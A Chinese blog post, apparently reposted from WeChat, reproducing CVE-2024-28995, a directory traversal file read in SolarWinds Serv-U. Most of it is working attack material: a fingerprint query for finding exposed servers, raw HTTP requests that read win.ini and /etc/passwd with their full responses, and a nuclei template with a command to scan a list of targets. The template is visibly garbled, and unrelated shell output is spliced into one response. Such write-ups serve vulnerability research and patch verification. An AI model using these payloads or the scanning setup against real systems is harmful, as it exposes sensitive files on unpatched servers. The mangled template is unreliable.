免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
SolarWinds Serv-U < 15.4.2 HF 2版本
03
—
漏洞描述
SolarWinds Serv-U FTP 是一款由SolarWinds公司开发的FTP服务器软件,它提供了一种安全、可靠的方式来管理和传输文件。2024年6月,官方发布安全更新,修复CVE-2024-28995 SolarWinds Serv-U FTP 目录遍历文件读取漏洞,攻击者无需登陆即可构造恶意请求读取系统上文件,造成敏感信息泄漏。
04
—
app="SolarWinds-Serv-U-FTP"
05
—
漏洞复现
windows环境POC数据包如下
GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/103.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
响应内容如下
HTTP/1.0 200 OK
Content-Length: 92
Accept-Encoding: deflate
Cache-Control: must-revalidate, private
Connection: close
Date: Mon, 17 Jun 2024 02:44:10 GMT
Expires: -1
Last-Modified: Thu, 22 Aug 2013 13:25:41 GMT
Referrer-Policy: same-origin
Server: Serv-U/15.4.1.128
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Permitted-Cross-Domain-Policies: none
X-Same-Domain: 1
X-Xss-Protection: 1; mode=block
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
linux环境POC数据包如下
GET /?InternalDir=........etc&InternalFile=passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
响应数据包如下
HTTP/1.0 200 OK
Content-Length: 1350
Accept-Encoding: deflate
Cache-Control: no-cache,no-store,max-age=0,must-revalidate
Connection: close
Content-Type: text/plain
Date: Mon, 17 Jun 2024 02:45:44 GMT
Expires: -1
Pragma: no-cache
Referrer-Policy: same-origin
Server: Serv-U/15.4.2.126
Set-Cookie: CsrfToken=; expires=Thu, 01-Jan-1970 00:00:01 GMT; SameSite=Strict; path=/; httponly
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Permitted-Cross-Domain-Policies: none
X-Same-Domain: 1
X-Xss-Protection: 1; mode=block
root:*:19856:0:99999:7:::
daemon:*:19856:0:99999:7:::
bin:*:19856:0:99999:7:::
sys:*:19856:0:99999:7:::
sync:*:19856:0:99999:7:::
games:*:19856:0:99999:7:::
man:*:19856:0:99999:7:::
lp:*:19856:0:99999:7:::
mail:*:19856:0:99999:7:::
news:*:19856:0:99999:7:::
uucp:*:19856:0:99999:7:::
proxy:*:19856:0:99999:7:::
www-data:*:19856:0:99999:7:::
backup:*:19856:0:99999:7:::
list:*:19856:0:99999:7:::
irc:*:19856:0:99999:7:::
_apt:*:19856:0:99999:7:::
nobody:*:19856:0:99999:7:::
root@79ea29878d8e:/# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
漏洞复现成功
06
—
nuclei poc
poc文件内容如下
id: CVE-2024-28995
info:
name: SolarWinds Serv-U FTP 目录遍历文件读取漏洞
author: fgz
severity: high
description: |
SolarWinds Serv-U FTP 是一款由SolarWinds公司开发的FTP服务器软件,它提供了一种安全、可靠的方式来管理和传输文件。2024年6月,官方发布安全更新,修复CVE-2024-28995 SolarWinds Serv-U FTP 目录遍历文件读取漏洞,攻击者无需登陆即可构造恶意请求读取系统上文件,造成敏感信息泄漏。
metadata:
verified: true
server="Serv-U" :
tags: cve,cve2024
http:
method: GET
path:
"{{BaseURL}}/?InternalDir=/../../../../windows&InternalFile=win.ini"
"{{BaseURL}}/?InternalDir=\..\..\..\..\etc&InternalFile=passwd"
true :
matchers:
type: dsl
dsl:
"contains(body, '; for 16-bit app support') || contains(body, '/root:/bin/bash')"
运行POC
nuclei.exe -t mypoc/cve/CVE-2024-28995.yaml -l data1.txt
07
—
修复建议
升级至 SolarWinds Serv-U 15.4.2 HF 2 及其以上版本。
原文始发于微信公众号(AI与网安):CVE-2024-28995 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论